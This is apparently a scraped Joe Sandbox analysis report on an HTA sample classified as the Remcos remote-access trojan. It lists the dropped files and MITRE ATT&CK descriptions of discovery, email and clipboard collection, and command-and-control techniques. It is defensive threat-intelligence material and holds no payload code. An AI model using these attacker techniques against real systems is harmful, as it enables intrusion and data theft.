Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report creamkissingthingswithcreambananapackagecreamy.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\creamykissinglipsgoodforcreamythingswithcreamicream[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Windows Analysis Report
creamkissingthingswithcreambananapackagecreamy.hta

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre